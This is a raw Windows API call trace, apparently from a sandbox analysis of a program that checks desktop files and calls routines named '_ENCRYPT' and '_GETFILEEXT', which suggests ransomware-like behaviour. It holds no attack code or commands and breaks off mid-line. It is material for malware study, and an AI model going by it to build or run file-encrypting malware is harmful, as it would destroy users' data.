[0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.082] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.084] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0032.084] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0032.084] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.084] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.085] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0032.085] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0032.085] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.085] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.086] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.087] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0032.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.087] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.087] CloseHandle (hObject=0x128) returned 1 [0032.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.088] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.088] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.088] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.088] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.088] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.089] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.089] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x2c0674d0, ftLastWriteTime.dwHighDateTime=0x1d5b605, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0x7c20c0 [0032.089] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.089] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x2c0674d0, ftLastWriteTime.dwHighDateTime=0x1d5b605, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0x7c20c0 [0032.089] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", 